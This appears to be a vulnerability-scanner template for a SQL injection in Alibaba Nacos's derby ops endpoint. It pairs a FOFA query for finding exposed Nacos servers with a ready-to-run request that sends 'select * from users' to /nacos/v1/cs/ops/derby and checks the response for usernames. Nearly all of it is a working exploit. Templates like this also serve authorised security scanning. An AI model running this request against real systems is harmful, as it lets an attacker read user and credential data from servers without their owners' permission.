product: Alibaba Nacos
vName: Nacos derby SQL注入
type: SQL注入
vID:
  - CNVD-2020-67618
level: 3
vDesc: Nacos v1/cs/ops/derby 存在SQL注入
version: ''
note: ''
search:
  FOFA: title="Nacos" || icon_hash="13942501"
protocol: http
link: https://zhuanlan.zhihu.com/p/633974026
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /nacos/v1/cs/ops/derby?sql=select * from users
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - USERNAME
            logic: and